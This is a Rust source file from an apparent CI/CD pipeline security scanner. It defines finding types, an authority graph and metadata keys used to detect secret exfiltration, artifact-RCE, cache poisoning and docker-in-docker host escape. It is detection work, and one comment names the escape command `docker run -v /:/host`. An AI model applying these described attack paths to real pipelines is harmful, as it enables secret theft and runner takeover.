646    /// emitting taudit run. `None` (the default) and `Some("")` are the
647    /// same equivalence class — both contribute the empty marker to the
648    /// canonical string.
649    #[serde(default, skip_serializing_if = "Option::is_none")]
650    pub fingerprint_anchor: Option<String>,
651
652    /// Scope of confidence for this finding. Current built-in rules are
653    /// `yaml_only`: taudit has proved a static authority shape in the scanned
654    /// YAML artifact, but runtime/provider settings may still affect
655    /// exploitability.
656    #[serde(default, skip_serializing_if = "Option::is_none")]
657    pub confidence_scope: Option<String>,
658
659    /// Human-readable runtime or control-plane assumptions that must be
660    /// verified before treating the static finding as live exploitability.
661    #[serde(default, skip_serializing_if = "Vec::is_empty")]
662    pub runtime_preconditions: Vec<String>,
663
664    /// True when exploitability materially depends on provider-side controls
665    /// not represented in the YAML artifact, such as Azure DevOps service
666    /// connection authorization or GitHub repository settings.
667    #[serde(default, skip_serializing_if = "is_false")]
668    pub portal_control_dependency: bool,
669
670    /// Coarse authority kinds involved in the finding: e.g. `job_token`,
671    /// `oidc_identity`, `service_connection`, `variable_group`,
672    /// `credential_named_variable`, `artifact`, or `image`.
673    #[serde(default, skip_serializing_if = "Vec::is_empty")]
674    pub authority_kinds: Vec<String>,
675
676    /// Coarse attacker-influenced surfaces involved in the finding: e.g.
677    /// `untrusted_checkout`, `script_sink`, `mutable_dependency_ref`,
678    /// `reusable_workflow_boundary`, or `self_hosted_runner`.
679    #[serde(default, skip_serializing_if = "Vec::is_empty")]
680    pub attacker_surface_kinds: Vec<String>,
681
682    /// Template/reusable-workflow resolution strength for delegation findings:
683    /// `resolved`, `partial`, `opaque`, or `not_applicable`.
684    #[serde(default, skip_serializing_if = "Option::is_none")]
685    pub template_resolution_strength: Option<String>,
686
687    /// Relationship between this finding and any cited CVE/advisory:
688    /// `same_primitive`, `same_authority_shape`, `analogue_only`, or
689    /// `not_applicable`.
690    #[serde(default, skip_serializing_if = "Option::is_none")]
691    pub cve_relationship: Option<String>,
692}
693
694impl FindingExtras {
695    /// Convenience constructor for the common case of "default extras
696    /// plus a per-finding fingerprint anchor". Used by rules whose
697    /// emission sites have no natural graph-node anchor and need the
698    /// anchor to discriminate multiple findings of the same rule in one
699    /// file (see `compute_fingerprint` v3 contract).
700    pub fn with_anchor(anchor: impl Into<String>) -> Self {
701        Self {
702            fingerprint_anchor: Some(anchor.into()),
703            ..Self::default()
704        }
705    }
706
707    /// Convenience constructor for report-facing metadata that is not a
708    /// fingerprint anchor. Keeps rule call sites additive rather than forcing
709    /// every built-in rule to hand-populate publication context.
710    pub fn with_confidence_scope(scope: impl Into<String>) -> Self {
711        Self {
712            confidence_scope: Some(scope.into()),
713            ..Self::default()
714        }
715    }
716}
717
718#[allow(clippy::trivially_copy_pass_by_ref)]
719fn is_false(b: &bool) -> bool {
720    !*b
721}
722
723/// A finding is a concrete, actionable authority issue.
724#[allow(missing_docs)]
725#[derive(Debug, Clone, Serialize, Deserialize)]
726pub struct Finding {
727    pub severity: Severity,
728    pub category: FindingCategory,
729    #[serde(skip_serializing_if = "Option::is_none")]
730    pub path: Option<PropagationPath>,
731    pub nodes_involved: Vec<NodeId>,
732    pub message: String,
733    pub recommendation: Recommendation,
734    /// Provenance of this finding. Defaults to `BuiltIn` for backward
735    /// compatibility with code/JSON that predates the field — every
736    /// in-tree built-in rule sets this explicitly. Deserialization of older
737    /// JSON without the field treats the finding as built-in.
738    #[serde(default)]
739    pub source: FindingSource,
740    /// Optional metadata (group id, time-to-fix, compensating controls,
741    /// suppression markers). Flattens into the JSON object so consumers
742    /// see top-level fields — see `FindingExtras` for individual semantics.
743    #[serde(flatten, default)]
744    pub extras: FindingExtras,
745}
746
747impl Finding {
748    /// Builder helper: attach a `time_to_fix` annotation to this finding.
749    /// Call sites: `let f = Finding { ... }.with_time_to_fix(FixEffort::Trivial);`
750    pub fn with_time_to_fix(mut self, effort: FixEffort) -> Self {
751        self.extras.time_to_fix = Some(effort);
752        self
753    }
754
755    /// Builder helper: append a compensating control description and
756    /// downgrade severity by one tier (Critical -> High -> Medium -> Low -> Info).
757    /// Records the original severity so the audit trail survives.
758    pub fn with_compensating_control(mut self, control: impl Into<String>) -> Self {
759        let original = self.severity;
760        self.extras.compensating_controls.push(control.into());
761        self.severity = downgrade_severity(self.severity);
762        if self.extras.original_severity.is_none() {
763            self.extras.original_severity = Some(original);
764        }
765        self
766    }
767}
768
769// ── Graph types: NodeId / EdgeId aliases ─────────────────────────
770
771/// Unique identifier for a node in the authority graph.
772///
773/// **Stability contract.** `NodeId` values are dense indices stable within a
774/// single scan / graph emission (`taudit graph --format json`). They are
775/// **not** stable across separate scans — two runs against the same input
776/// pipeline can renumber nodes if the parser visits them in a different
777/// order. Downstream consumers that need cross-run identity should key on
778/// the finding `fingerprint` (in JSON / SARIF / CloudEvents output) rather
779/// than `NodeId`. See `docs/finding-fingerprint.md`.
780pub type NodeId = usize;
781
782/// Unique identifier for an edge in the authority graph.
783///
784/// **Stability contract.** Same caveat as [`NodeId`] — dense indices stable
785/// within one emitted graph, NOT stable across runs. Use fingerprints for
786/// cross-run identity.
787pub type EdgeId = usize;
788
789// ── Metadata key constants ───────────────────────────────────────
790// Avoids stringly-typed bugs across crate boundaries.
791//
792// Every constant below is a key string that downstream consumers may read
793// from `Node.metadata` or `AuthorityGraph.metadata` in emitted JSON.
794
795/// Records the digest of a pinned action / image reference.
796pub const META_DIGEST: &str = "digest";
797/// Records the `permissions:` block scoped to an Identity / Step node.
798pub const META_PERMISSIONS: &str = "permissions";
799/// Records the inferred breadth of an identity's scope (`broad` / `constrained` / `unknown`).
800pub const META_IDENTITY_SCOPE: &str = "identity_scope";
801/// Marks a metadata value that the parser inferred rather than read literally.
802pub const META_INFERRED: &str = "inferred";
803/// Marks an Image node as a job container (not a `uses:` action).
804pub const META_CONTAINER: &str = "container";
805/// Marks an Identity node as OIDC-capable (`permissions: id-token: write`).
806pub const META_OIDC: &str = "oidc";
807/// Marks a Secret node whose value is interpolated into a CLI flag argument (e.g. `-var "key=$(SECRET)"`).
808/// CLI flag values appear in pipeline log output even when ADO secret masking is active,
809/// because the command string is logged before masking runs and Terraform itself logs `-var` values.
810pub const META_CLI_FLAG_EXPOSED: &str = "cli_flag_exposed";
811/// Graph-level metadata: identifies the trigger type (e.g. `pull_request_target`, `pr`).
812pub const META_TRIGGER: &str = "trigger";
813/// Marks a Step that writes to the environment gate (`$GITHUB_ENV`, ADO `##vso[task.setvariable]`).
814pub const META_WRITES_ENV_GATE: &str = "writes_env_gate";
815/// Marks a Step that writes a `$(secretRef)` value to the env gate. Co-set with
816/// META_WRITES_ENV_GATE when the written VALUE contains an ADO `$(VAR)` expression,
817/// distinguishing secret-exfiltration from plain-integer or literal env-gate writes.
818pub const META_ENV_GATE_WRITES_SECRET_VALUE: &str = "env_gate_writes_secret_value";
819/// Marks a Step that came from an ADO `##vso[task.setvariable]` call (as opposed to
820/// a GHA `>> $GITHUB_ENV` redirect). Used to distinguish the two env-gate write
821/// patterns so BUG-4 suppression only applies to ADO plain-value writes.
822pub const META_SETVARIABLE_ADO: &str = "setvariable_ado";
823/// Marks a Step that reads from the runner-managed environment via an
824/// `env.<NAME>` template reference — `${{ env.X }}` in a `with:` value,
825/// inline script body, or step `env:` mapping. Distinct from `secrets.X`
826/// references (which produce a HasAccessTo edge to a Secret node) — `env.X`
827/// references can be sourced from the ambient runner environment, including
828/// values laundered through `$GITHUB_ENV` by an earlier step. Stamped by
829/// the GHA parser so `secret_via_env_gate_to_untrusted_consumer` can find
830/// the gate-laundering chain that the explicit-secret rules miss.
831pub const META_READS_ENV: &str = "reads_env";
832/// Marks a Step that performs cryptographic provenance attestation (e.g. `actions/attest-build-provenance`).
833pub const META_ATTESTS: &str = "attests";
834/// Marks a Secret node sourced from an ADO variable group (vs inline pipeline variable).
835pub const META_VARIABLE_GROUP: &str = "variable_group";
836/// Marks an Image node as a self-hosted agent pool (pool.name on ADO; runs-on: self-hosted on GHA).
837pub const META_SELF_HOSTED: &str = "self_hosted";
838/// Marks a Step that performs a `checkout: self` (ADO) or default `actions/checkout` on a PR context.
839pub const META_CHECKOUT_SELF: &str = "checkout_self";
840/// Marks an Identity node as an ADO service connection.
841pub const META_SERVICE_CONNECTION: &str = "service_connection";
842/// Marks an Identity node as implicitly injected by the platform (e.g. ADO System.AccessToken).
843/// Implicit tokens are structurally accessible to all tasks by platform design — exposure
844/// to untrusted steps is Info-level (structural) rather than Critical (misconfiguration).
845pub const META_IMPLICIT: &str = "implicit";
846/// Marks a Step that belongs to an ADO deployment job whose `environment:` is
847/// configured with required approvals — a manual gate that breaks automatic
848/// authority propagation. Findings whose path crosses such a node have their
849/// severity reduced by one step (Critical → High → Medium → Low).
850pub const META_ENV_APPROVAL: &str = "env_approval";
851/// Records the parent job name on every Step node, enabling per-job subgraph
852/// filtering (e.g. `taudit map --job build`) and downstream consumers that
853/// need to attribute steps back to their containing job. Set by both the GHA
854/// and ADO parsers on every Step they create within a job's scope.
855pub const META_JOB_NAME: &str = "job_name";
856/// Step-level metadata: normalized GitHub Actions `uses:` action name without
857/// its `@ref` suffix, for example `docker/login-action`. Set only by the GHA
858/// parser on `uses:` steps.
859pub const META_GHA_ACTION: &str = "gha_action";
860/// Step-level metadata: sorted scalar `with:` inputs for a GHA `uses:` step,
861/// encoded as newline-delimited `key=value` records. Non-scalar inputs are
862/// omitted. Consumed by action-specific rules that need precision controls
863/// such as `mask-password: false` or `skip_install: true`.
864pub const META_GHA_WITH_INPUTS: &str = "gha_with_inputs";
865/// Graph-level metadata: JSON-encoded array of `resources.repositories[]`
866/// entries declared by the pipeline. Each entry is an object with fields
867/// `alias`, `repo_type`, `name`, optional `ref`, and `used` (true when the
868/// alias is referenced via `template: x@alias`, `extends: x@alias`, or
869/// `checkout: alias` somewhere in the same pipeline file). Set by the ADO
870/// parser; consumed by `template_extends_unpinned_branch`.
871pub const META_REPOSITORIES: &str = "repositories";
872/// Records the raw inline script body of a Step (the text from
873/// `script:` / `bash:` / `powershell:` / `pwsh:` / `run:` / task
874/// `inputs.script` / `inputs.Inline` / `inputs.inlineScript`). Stamped by
875/// parsers when the step has an inline script. Consumed by script-aware
876/// rules: `vm_remote_exec_via_pipeline_secret`,
877/// `short_lived_sas_in_command_line`, `secret_to_inline_script_env_export`,
878/// `secret_materialised_to_workspace_file`, `keyvault_secret_to_plaintext`,
879/// `add_spn_with_inline_script`, `parameter_interpolation_into_shell`.
880/// Stored verbatim — rules apply their own pattern matching.
881pub const META_SCRIPT_BODY: &str = "script_body";
882/// Records the name of the ADO service connection a step uses (the value of
883/// `inputs.azureSubscription` / `inputs.connectedServiceName*`). Set on the
884/// Step node itself (in addition to the Identity node it links to) so rules
885/// can pattern-match on the connection name without traversing edges.
886pub const META_SERVICE_CONNECTION_NAME: &str = "service_connection_name";
887/// Marks a Step as performing `terraform apply ... -auto-approve` (either via
888/// an inline script or via a `TerraformCLI` / `TerraformTask` task with
889/// `command: apply` and `commandOptions` containing `auto-approve`).
890pub const META_TERRAFORM_AUTO_APPROVE: &str = "terraform_auto_approve";
891/// Marks a Step task that runs with `addSpnToEnvironment: true`, exposing
892/// the federated SPN (idToken / servicePrincipalKey / servicePrincipalId /
893/// tenantId) to the inline script body via environment variables.
894pub const META_ADD_SPN_TO_ENV: &str = "add_spn_to_environment";
895/// Graph-level metadata: identifies the source platform of the parsed
896/// pipeline. Set by every parser to its `platform()` value
897/// (`"github-actions"`, `"azure-devops"`, `"gitlab"`). Allows platform-scoped
898/// rules to gate their detection without parsing the source file path.
899pub const META_PLATFORM: &str = "platform";
900/// Graph-level metadata: marks a GitHub Actions workflow as having NO
901/// top-level `permissions:` block declared. Set by the GHA parser when
902/// `workflow.permissions` is absent so rules can detect the negative-space
903/// "no permissions block at all" pattern (which leaves `GITHUB_TOKEN` at its
904/// broad platform default — `contents: write`, `packages: write`, etc.).
905pub const META_NO_WORKFLOW_PERMISSIONS: &str = "no_workflow_permissions";
906/// Marks a Step in a GHA workflow as carrying an `if:` condition that
907/// references the standard fork-check pattern
908/// (`github.event.pull_request.head.repo.fork == false` or the equivalent
909/// `head.repo.full_name == github.repository`). Stamped by the GHA parser so
910/// rules can credit the step with the compensating control without
911/// re-parsing the YAML expression. Bool stored as `"true"`.
912pub const META_FORK_CHECK: &str = "fork_check";
913/// Marks a GitLab CI job (Step node) whose `rules:` or `only:` clause
914/// restricts execution to protected branches — either via an explicit
915/// `if: $CI_COMMIT_REF_PROTECTED == "true"` rule, an `if: $CI_COMMIT_BRANCH
916/// == $CI_DEFAULT_BRANCH` rule, or an `only: [main, ...]` allowlist of
917/// platform-protected refs. Set by the GitLab parser. Absence on a
918/// deployment job is a control gap.
919pub const META_RULES_PROTECTED_ONLY: &str = "rules_protected_only";
920/// Graph-level metadata: comma-joined list of every entry under `on:` (e.g.
921/// `pull_request_target,issue_comment,workflow_run`). Distinct from
922/// `META_TRIGGER` (singular) which is set only for `pull_request_target` /
923/// ADO `pr` to preserve the existing `trigger_context_mismatch` contract.
924/// Consumers of this list (e.g. `risky_trigger_with_authority`) must split on
925/// `,` and treat each token as a trigger name.
926pub const META_TRIGGERS: &str = "triggers";
927/// Graph-level metadata: comma-joined list of `workflow_dispatch.inputs.*`
928/// names declared by the workflow. Empty / absent if the workflow has no
929/// `workflow_dispatch` trigger. Consumed by
930/// `manual_dispatch_input_to_url_or_command` to taint-track input flow into
931/// command lines, URLs, and `actions/checkout` refs.
932pub const META_DISPATCH_INPUTS: &str = "dispatch_inputs";
933/// Graph-level metadata: pipe-delimited list of `<job>\t<name>\t<source>`
934/// records, one per `jobs.<id>.outputs.<name>`. Records are joined with `|`,
935/// fields within a record with `\t`. `source` is one of `secret` (value
936/// reads `secrets.*`), `oidc` (value references `steps.*.outputs.*` from a
937/// step that holds an OIDC identity), `step_output` (any other
938/// `steps.*.outputs.*`), or `literal`. Plain-text rather than JSON to keep
939/// the parser crate free of `serde_json`. Consumed by
940/// `sensitive_value_in_job_output`.
941pub const META_JOB_OUTPUTS: &str = "job_outputs";
942/// Step-level metadata: the value passed to `actions/checkout`'s `with.ref`
943/// input (verbatim, including any `${{ … }}` expressions). Stamped only on
944/// `actions/checkout` steps that supply a `ref:`. Consumed by
945/// `manual_dispatch_input_to_url_or_command`.
946pub const META_CHECKOUT_REF: &str = "checkout_ref";
947/// Marks the synthetic Step node created for a job that delegates to a
948/// reusable workflow with `secrets: inherit`. The whole secret bag forwards
949/// to the callee regardless of what the callee actually consumes — when the
950/// caller is fired by an attacker-controllable trigger this is a wide-open
951/// exfiltration path. Set on the synthetic step node by the GHA parser.
952pub const META_SECRETS_INHERIT: &str = "secrets_inherit";
953/// Marks a Step that downloads a workflow artifact (typically
954/// `actions/download-artifact` or `dawidd6/action-download-artifact`).
955/// In `workflow_run`-triggered consumers, the originating run's artifacts
956/// were produced from PR context — the consumer must treat their content as
957/// untrusted input even when the consumer itself runs with elevated perms.
958pub const META_DOWNLOADS_ARTIFACT: &str = "downloads_artifact";
959/// Marks a Step whose body interprets artifact (or other untrusted file)
960/// content into a privileged sink — `unzip`/`tar -x`, `cat`/`jq` piping
961/// into `>> $GITHUB_ENV`/`>> $GITHUB_OUTPUT`, `eval`, posting to a PR
962/// comment via `actions/github-script` `body:`/`issue_body:`, or evaluating
963/// extracted text. Combined with `META_DOWNLOADS_ARTIFACT` upstream in the
964/// same job and a `workflow_run`/`pull_request_target` trigger this is the
965/// classic mypy_primer / coverage-comment artifact-RCE pattern.
966pub const META_INTERPRETS_ARTIFACT: &str = "interprets_artifact";
967/// Marks a Step that uses an interactive debug action (mxschmitt/action-tmate,
968/// lhotari/action-upterm, actions/tmate, etc.). The cell value is the action
969/// reference (e.g. `mxschmitt/action-tmate@v3`). A successful debug session
970/// gives the operator an external SSH endpoint with the runner's full
971/// environment loaded — every secret in scope, the checked-out HEAD, and
972/// write access to whatever the GITHUB_TOKEN holds.
973pub const META_INTERACTIVE_DEBUG: &str = "interactive_debug";
974/// Marks a Step that calls `actions/cache` (or `actions/cache/save` /
975/// `actions/cache/restore`). The cell value is the raw `key:` input from
976/// the step's `with:` block. Consumed by `pr_specific_cache_key_in_default_branch_consumer`
977/// to detect PR-derived cache keys (head_ref, head.ref, actor) that a
978/// default-branch run can later restore — classic cache poisoning.
979pub const META_CACHE_KEY: &str = "cache_key";
980/// Records the OIDC audience (`aud:`) value of an `id_tokens:` entry on an
981/// Identity node. GitLab CI emits one Identity per `id_tokens:` key; the
982/// audience is what trades for downstream cloud creds (Vault path, AWS role,
983/// etc), so audience reuse across MR-context and protected-context jobs is
984/// the precise privilege-overscope signal. Set by the GitLab parser.
985pub const META_OIDC_AUDIENCE: &str = "oidc_audience";
986/// Records the comma-joined list of `id_tokens.aud:` values when GitLab CI
987/// declares the audience as a YAML sequence (multi-cloud broker — strongest
988/// over-scoping signal). When set, the legacy `META_OIDC_AUDIENCE` field
989/// holds the same comma-joined string for backward compatibility, and this
990/// field is the explicit "this was a list" marker. Set by the GitLab parser
991/// only on the multi-aud path; absent for scalar `aud:` values.
992pub const META_OIDC_AUDIENCES: &str = "oidc_audiences";
993/// Records a Step's `environment:url:` value verbatim. Stamped by the GitLab
994/// parser when the job declares an `environment:` mapping with a `url:`
995/// field. Consumed by `untrusted_ci_var_in_shell_interpolation` because
996/// `environment:url:` is rendered by the GitLab UI and any predefined-CI-var
997/// interpolated into it is a stored-XSS / open-redirect sink.
998pub const META_ENVIRONMENT_URL: &str = "environment_url";
999/// Graph-level metadata: JSON-encoded array of `include:` entries declared by
1000/// a GitLab CI pipeline. Each entry is an object with fields:
1001/// - `kind`: one of `local`, `remote`, `template`, `project`, `component`
1002/// - `target`: the path/URL/project string
1003/// - `git_ref`: the resolved `ref:` value (only meaningful for `project` and
1004///   `remote`) — empty string when the include omits a `ref:`
1005///
1006/// Set by the GitLab parser; consumed by `unpinned_include_remote_or_branch_ref`.
1007pub const META_GITLAB_INCLUDES: &str = "gitlab_includes";
1008/// Marks a Step (GitLab job) that declares one or more `services:` entries
1009/// matching `docker:*-dind` or `docker:dind`. Combined with secret-bearing
1010/// HasAccessTo edges it indicates a runtime sandbox-escape primitive — any
1011/// inline build step can `docker run -v /:/host` from inside dind.
1012pub const META_GITLAB_DIND_SERVICE: &str = "gitlab_dind_service";
1013/// Marks a Step (GitLab job) declared with `allow_failure: true`. Used by
1014/// `security_job_silently_skipped` to detect scanner jobs that pass silently.
1015pub const META_GITLAB_ALLOW_FAILURE: &str = "gitlab_allow_failure";
1016/// Records the comma-joined list of `extends:` template names a GitLab job
1017/// inherits from. Used by scanner-name pattern matching in
1018/// `security_job_silently_skipped` because GitLab security templates are
1019/// usually consumed via `extends:` rather than by job-name match.
1020pub const META_GITLAB_EXTENDS: &str = "gitlab_extends";
1021/// Marks a Step (GitLab job) that defines a `trigger:` block (downstream /
1022/// child pipeline). Value is `"static"` for a fixed downstream `project:` or
1023/// `include:` of in-tree YAML, and `"dynamic"` when the include source is an
1024/// `artifact:` (dynamic child pipelines — code-injection sink).
1025pub const META_GITLAB_TRIGGER_KIND: &str = "gitlab_trigger_kind";
1026/// Records the literal `cache.key:` value declared on a GitLab job (or the
1027/// empty string if no cache is declared). Consumed by
1028/// `cache_key_crosses_trust_boundary` to detect cross-trust cache keys.
1029pub const META_GITLAB_CACHE_KEY: &str = "gitlab_cache_key";
1030/// Records the `cache.policy:` value declared on a GitLab job
1031/// (`pull` / `push` / `pull-push` / `pull_push`). When absent, the GitLab
1032/// runtime default is `pull-push`. Consumed by
1033/// `cache_key_crosses_trust_boundary`.
1034pub const META_GITLAB_CACHE_POLICY: &str = "gitlab_cache_policy";
1035/// Records the deployment environment name on a Step
1036/// (e.g. GitLab `environment.name:` / GHA `environment:`).
1037/// Used by rules that gate on production-like environment names.
1038pub const META_ENVIRONMENT_NAME: &str = "environment_name";
1039/// Records the GitLab `artifacts.reports.dotenv:` file path for a Step.
1040/// When set, the file's `KEY=value` lines are silently exported as
1041/// pipeline variables for every downstream job that consumes this job
1042/// via `needs:` or `dependencies:`. Consumed by
1043/// `dotenv_artifact_flows_to_privileged_deployment`.
1044pub const META_DOTENV_FILE: &str = "dotenv_file";
1045/// Records, on a Step, the upstream job names this step consumes via
1046/// GitLab `needs:` or `dependencies:`. Comma-separated job names.
1047/// Used to build dotenv-flow dependency chains across stages.
1048pub const META_NEEDS: &str = "needs";
1049/// Marks an Image node (self-hosted agent pool) as having workspace isolation
1050/// configured (`workspace: { clean: all }` or `workspace: { clean: true }` in
1051/// ADO). When present, the agent workspace is wiped between runs, mitigating
1052/// workspace poisoning attacks where a PR build leaves malicious files for the
1053/// next privileged pipeline run. Absence of this key on a self-hosted Image
1054/// node is the signal for `shared_self_hosted_pool_no_isolation`.
1055pub const META_WORKSPACE_CLEAN: &str = "workspace_clean";
1056/// Step-level metadata: the AND-joined chain of `condition:` expressions that
1057/// gate this step's runtime execution (stage condition, then job condition,
1058/// then step condition, joined with ` AND `). Stamped by parsers that surface
1059/// runtime gating expressions — currently the ADO parser (stage / job / step
1060/// `condition:`). Presence of this key means the step is NOT unconditionally
1061/// reachable on every trigger; the runtime evaluator decides via expression
1062/// (e.g. `eq(variables['Build.SourceBranch'], 'refs/heads/main')`). Consumed
1063/// by `apply_compensating_controls` to downgrade severity on findings whose
1064/// firing step is gated behind a conditional.
1065pub const META_CONDITION: &str = "condition";
1066/// Step-level metadata: comma-joined list of upstream stage / job names this
1067/// step's container declared via a non-default `dependsOn:` value. Default ADO
1068/// behaviour ("depends on the previous job/stage") is NOT stamped — only
1069/// explicit overrides. Currently a parser-side hook for future cross-job
1070/// taint rules; no consumer rule exists yet.
1071pub const META_DEPENDS_ON: &str = "depends_on";
1072
1073// ── Shared serde helpers ─────────────────────────────────────────
1074
1075/// Serialize a `HashMap<String, V>` with keys in sorted order. The
1076/// in-memory representation stays a `HashMap` (cheaper insertion, hot
1077/// path on every parser); only the serialized form is canonicalised.
1078/// This is the single point of determinism control for graph metadata
1079/// emitted via JSON / SARIF / CloudEvents — without it, HashMap iteration
1080/// order leaks per-process randomness into every diff and cache key.
1081///
1082/// Public so the engine crate (`taudit-core`) can apply the same
1083/// canonical ordering to its `AuthorityGraph` HashMap fields.
1084#[doc(hidden)]
1085pub fn serialize_string_map_sorted<S, V>(
1086    map: &HashMap<String, V>,
1087    serializer: S,
1088) -> Result<S::Ok, S::Error>
1089where
1090    S: Serializer,
1091    V: Serialize,
1092{
1093    let sorted: BTreeMap<&String, &V> = map.iter().collect();
1094    sorted.serialize(serializer)
1095}
1096
1097// ── Graph-level precision markers ────────────────────────────────
1098
1099/// The category of reason why a graph is partial.
1100#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
1101#[serde(rename_all = "snake_case")]
1102pub enum GapKind {
1103    /// A template or matrix expression hides a value; graph structure is intact.
1104    Expression,
1105    /// An unresolvable component (composite action, reusable workflow, extends,
1106    /// include) breaks the authority chain.
1107    Structural,
1108    /// The graph cannot be built at all (zero steps produced, unknown platform).
1109    Opaque,
1110}
1111
1112/// How complete is this authority graph? Parsers set this based on whether
1113/// they could fully resolve all authority relationships in the pipeline YAML.
1114///
1115/// A `Partial` graph is still useful — it just tells the consumer that some
1116/// authority paths may be missing. This is better than silent incompleteness.
1117#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
1118#[serde(rename_all = "snake_case")]
1119pub enum AuthorityCompleteness {
1120    /// Parser resolved all authority relationships.
1121    Complete,
1122    /// Parser found constructs it couldn't fully resolve (e.g. secrets in
1123    /// shell strings, composite actions, reusable workflows). The graph
1124    /// captures what it can, but edges may be missing.
1125    Partial,
1126    /// Parser couldn't determine completeness.
1127    Unknown,
1128}
1129
1130/// How broad is an identity's scope? Classifies the risk surface of tokens,
1131/// service principals, and OIDC identities.
1132#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
1133#[serde(rename_all = "snake_case")]
1134pub enum IdentityScope {
1135    /// Wide permissions: write-all, admin, or unscoped tokens.
1136    Broad,
1137    /// Narrow permissions: contents:read, specific scopes.
1138    Constrained,
1139    /// Scope couldn't be determined — treat as risky.
1140    Unknown,
1141}
1142
1143impl IdentityScope {
1144    /// Classify an identity scope from a permissions string.
1145    pub fn from_permissions(perms: &str) -> Self {
1146        let p = perms.to_lowercase();
1147        if p.contains("write-all") || p.contains("admin") || p == "{}" || p.is_empty() {
1148            IdentityScope::Broad
1149        } else if p.contains("write") {
1150            // Any write permission = broad (conservative)
1151            IdentityScope::Broad
1152        } else if p.contains("read") {
1153            IdentityScope::Constrained
1154        } else {
1155            IdentityScope::Unknown
1156        }
1157    }
1158}
1159
1160// ── Node types ───────────────────────────────────────────────────
1161
1162/// Semantic kind of a graph node.
1163#[allow(missing_docs)]
1164#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
1165#[serde(rename_all = "snake_case")]
1166pub enum NodeKind {
1167    Step,
1168    Secret,
1169    Artifact,
1170    Identity,
1171    Image,
1172}
1173
1174/// Trust classification. Explicit on every node — not inferred from kind.
1175#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
1176#[serde(rename_all = "snake_case")]
1177pub enum TrustZone {
1178    /// Code/config authored by the repo owner.
1179    FirstParty,
1180    /// Marketplace actions, external images (pinned).
1181    ThirdParty,
1182    /// Unpinned actions, fork PRs, user input.
1183    Untrusted,
1184}
1185
1186impl TrustZone {
1187    /// Returns true if `self` is a lower trust level than `other`.
1188    pub fn is_lower_than(&self, other: &TrustZone) -> bool {
1189        self.rank() < other.rank()
1190    }
1191
1192    fn rank(&self) -> u8 {
1193        match self {
1194            TrustZone::FirstParty => 2,
1195            TrustZone::ThirdParty => 1,
1196            TrustZone::Untrusted => 0,
1197        }
1198    }
1199}
1200
1201/// A node in the authority graph.
1202#[allow(missing_docs)]
1203#[derive(Debug, Clone, Serialize, Deserialize)]
1204pub struct Node {
1205    pub id: NodeId,
1206    pub kind: NodeKind,
1207    pub name: String,
1208    pub trust_zone: TrustZone,
1209    /// Flexible metadata: pinning status, digest, scope, permissions, etc.
1210    /// Serialized in sorted-key order so JSON / SARIF / CloudEvents output
1211    /// is byte-deterministic across runs (HashMap iteration is randomised
1212    /// per process, which would otherwise break diffs and cache keys).
1213    #[serde(serialize_with = "serialize_string_map_sorted")]
1214    pub metadata: HashMap<String, String>,
1215}
1216
1217// ── Edge types ───────────────────────────────────────────────────
1218
1219/// Edge semantics model authority/data flow — not syntactic YAML relations.
1220/// Design test: "Can authority propagate along this edge?"
1221#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord, Hash, Serialize, Deserialize)]
1222#[serde(rename_all = "snake_case")]
1223pub enum EdgeKind {
1224    /// Step -> Secret or Identity (authority granted at runtime).
1225    HasAccessTo,
1226    /// Step -> Artifact (data flows out).
1227    Produces,
1228    /// Artifact -> Step (authority flows from artifact to consuming step).
1229    Consumes,
1230    /// Step -> Image/Action (execution delegation).
1231    UsesImage,
1232    /// Step -> Step (cross-job or action boundary).
1233    DelegatesTo,
1234    /// Step -> Secret or Identity (credential written to disk, outliving the step's lifetime).
1235    /// Distinct from HasAccessTo: disk persistence is accessible to all subsequent steps
1236    /// and processes with filesystem access, not just the step that created it.
1237    PersistsTo,
1238}
1239
1240/// Abbreviated authority context for **`HasAccessTo` → identity** edges in
1241/// JSON exports (ADR 0002 Phase 2). Copied from the target identity’s trust
1242/// zone and selected `metadata` keys so consumers need not reverse-engineer
1243/// raw `META_*` strings for common questions. Omitted on edges where absent.
1244#[derive(Debug, Clone, Default, PartialEq, Eq, Serialize, Deserialize)]
1245pub struct AuthorityEdgeSummary {
1246    /// Target identity trust zone (`first_party` / `third_party` / `untrusted`).
1247    #[serde(default, skip_serializing_if = "Option::is_none")]
1248    pub trust_zone: Option<String>,
1249    /// Copy of `identity_scope` metadata when present.
1250    #[serde(default, skip_serializing_if = "Option::is_none")]
1251    pub identity_scope: Option<String>,
1252    /// Copy of `permissions` metadata when present, truncated for bounded JSON.
1253    #[serde(default, skip_serializing_if = "Option::is_none")]
1254    pub permissions_summary: Option<String>,
1255}
1256
1257/// Maximum characters per summary string field on [`AuthorityEdgeSummary`].
1258pub const AUTHORITY_EDGE_SUMMARY_FIELD_MAX: usize = 192;
1259
1260/// A directed edge in the authority graph.
1261#[allow(missing_docs)]
1262#[derive(Debug, Clone, Serialize, Deserialize)]
1263pub struct Edge {
1264    pub id: EdgeId,
1265    pub from: NodeId,
1266    pub to: NodeId,
1267    pub kind: EdgeKind,
1268    /// Present on `has_access_to` edges whose target is an identity node.
1269    #[serde(default, skip_serializing_if = "Option::is_none")]
1270    pub authority_summary: Option<AuthorityEdgeSummary>,
1271}
1272
1273// ── Pipeline source ──────────────────────────────────────────────
1274
1275/// Where the pipeline definition came from.
1276#[allow(missing_docs)]
1277#[derive(Debug, Clone, Serialize, Deserialize)]
1278pub struct PipelineSource {
1279    pub file: String,
1280    #[serde(skip_serializing_if = "Option::is_none")]
1281    pub repo: Option<String>,
1282    #[serde(skip_serializing_if = "Option::is_none")]
1283    pub git_ref: Option<String>,
1284    /// SHA of the commit being analyzed; reproducibility hint when set.
1285    /// Parsers leave None; CI integrations populate this from the build env.
1286    #[serde(default, skip_serializing_if = "Option::is_none")]
1287    pub commit_sha: Option<String>,
1288}
1289
1290// ── Pipeline parameter spec ──────────────────────────────────────
1291
1292/// Pipeline-level parameter declaration captured from a top-level
1293/// `parameters:` block. Used by rules that need to reason about whether
1294/// caller-supplied parameter values are constrained (`values:` allowlist)
1295/// or free-form (no allowlist on a string parameter — shell-injection risk).
1296#[derive(Debug, Clone, Serialize, Deserialize)]
